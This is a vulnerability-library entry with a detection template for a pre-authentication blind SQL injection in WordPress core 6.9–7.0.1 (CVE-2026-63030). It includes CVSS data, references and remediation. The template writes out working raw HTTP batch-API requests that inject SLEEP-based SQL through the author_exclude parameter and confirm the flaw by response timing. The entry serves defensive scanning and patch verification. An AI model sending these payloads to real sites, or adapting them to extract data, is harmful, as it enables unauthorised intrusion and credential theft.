/Vulnerability Library

WordPress Core 6.9-7.0.1 - Pre-Auth Blind SQL Injection (Batch-Route Confusion)

CVE-2026-63030
Early Release

Description

WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication timing-based blind SQL injection via the REST API batch endpoint. A route confusion vulnerability (CVE-2026-63030) allows nested batch requests to bypass authentication checks, while a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter of /wp/v2/categories allows arbitrary SQL queries via a SLEEP-based timing oracle. An unauthenticated attacker can extract the full database contents including user credentials.

Severity

Critical

CVSS Score

9.8

Affected Product

wordpress

Published Date

July 18, 2026

Template Author

slcyber, mielverkerken, pdteam

CVE-2026-63030.yaml
id: CVE-2026-63030

info:
  name: WordPress Core 6.9-7.0.1 - Pre-Auth Blind SQL Injection (Batch-Route Confusion)
  author: slcyber,mielverkerken,pdteam
  severity: critical
  description: |
    WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication timing-based blind SQL injection via the REST API batch endpoint. A route confusion vulnerability (CVE-2026-63030) allows nested batch requests to bypass authentication checks, while a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter of /wp/v2/categories allows arbitrary SQL queries via a SLEEP-based timing oracle. An unauthenticated attacker can extract the full database contents including user credentials.
  impact: |
    An unauthenticated attacker can read the entire WordPress database contents including user credentials (password hashes), posts, configuration, and any stored secrets. This enables full site compromise through credential extraction and offline password cracking. The original research demonstrated extracting admin password hashes and is working toward full remote code execution.
  remediation: |
    Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /?rest_route=/batch/v1 at the WAF or reverse proxy level.
  reference:
    - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q
    - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjf
    - https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core
    - https://www.aikido.dev/blog/unauthenticated-rce-in-wordpress-wp2shell
    - https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
    - https://github.com/sergiointel/wp2shell-poc/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-63030,CVE-2026-60137
    cwe-id: CWE-89,CWE-287
  metadata:
    verified: true
    max-request: 3
    vendor: wordpress
    product: wordpress
    framework: wordpress
    shodan-query: http.component:"wordpress"
    fofa-query: app="WordPress"
  tags: cve,cve2026,wordpress,wp-core,sqli,time-based-sqli,preauth,batch-api,blind-sqli,vkev

flow: http(1) && http(2) && http(3)

http:
  # Step 1: Confirm the target is a WordPress site
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "wp-content") || contains(body, "wp-includes") || contains(tolower(header), "rest_route")'
        internal: true

  # Step 2: FALSE condition — SLEEP should NOT trigger, response must be fast
  - raw:
      - |
        POST /?rest_route=/batch/v1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"requests":[{"method":"POST","path":"http://:"},{"method":"POST","path":"/wp/v2/posts","body":{"requests":[{"method":"GET","path":"http://:"},{"method":"GET","path":"/wp/v2/categories?author_exclude=SELECT+IF%28%281%3D0%29%2CSLEEP%287%29%2C0%29"},{"method":"GET","path":"/wp/v2/posts"}]}},{"method":"POST","path":"/batch/v1"}]}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 207
        internal: true

      - type: word
        part: body
        words:
          - "parse_path_failed"
        internal: true

  # Step 3: TRUE condition — SLEEP(7) must trigger, confirming SQL injection execution
  - raw:
      - |
        @timeout: 20s
        POST /?rest_route=/batch/v1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"requests":[{"method":"POST","path":"http://:"},{"method":"POST","path":"/wp/v2/posts","body":{"requests":[{"method":"GET","path":"http://:"},{"method":"GET","path":"/wp/v2/categories?author_exclude=SELECT+IF%28%281%3D1%29%2CSLEEP%287%29%2C0%29"},{"method":"GET","path":"/wp/v2/posts"}]}},{"method":"POST","path":"/batch/v1"}]}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 207
# digest: 490a00463044022051ceff5cfeccf59bb95d7fc75bdf8154dc99041284f15cee73cb29cbb2920ce402205ae06c9030f8de17a8007aa9de6e03cf36e006c3dd4ef6268dfb22e0a7ab193d:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-63030cve-2026-60137
CWE ID:
cwe-89, cwe-287

References

https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662qhttps://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjfhttps://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-corehttps://www.aikido.dev/blog/unauthenticated-rce-in-wordpress-wp2shellhttps://wordpress.org/news/2026/07/wordpress-7-0-2-release/https://github.com/sergiointel/wp2shell-poc/

Remediation Steps

Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /?rest_route=/batch/v1 at the WAF or reverse proxy level.